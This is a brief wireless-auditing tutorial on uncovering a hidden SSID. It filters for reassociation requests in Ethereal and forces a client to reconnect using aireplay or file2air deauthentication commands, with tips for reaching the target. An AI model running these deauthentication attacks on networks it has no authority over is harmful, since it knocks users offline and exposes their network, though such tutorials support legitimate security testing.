It is possible to use Kismet or Airodump to capture the packets in this process BUT I have found that ethereal is this most consistent, therefore I will only discuss the procedures for obtaining a cloaked SSID using ethereal.

Start ethereal with the required filters preloaded

#start-ethereal

From the toolbar select Capture → Interfaces → ath0 Prepare

In the filters box click the the down arrow and select:

wlan.fc.type_subtype= = 2

click the tick button to apply

Now deauthorise a connected client:

Use either:

#aireplay -0 1 -a <AP_MAC> -c <Client_MAC> ath0

or

#file2air -i ath0 -r madwifi -f /KNOPPIX/files/deauth.bin -c <channel> -n 5000 -d <Client_MAC> -b <BSSID> -s <AP_MAC>  NOTE: THIS CAN CAUSE THE KERNEL TO CRASH

If this fails to produce the reassociation request you will have to try one or more of the following

Move closer to the target
Use a high gain antenna
Increase the number after the -n from 5000
Try a different .bin file, such as beacon.bin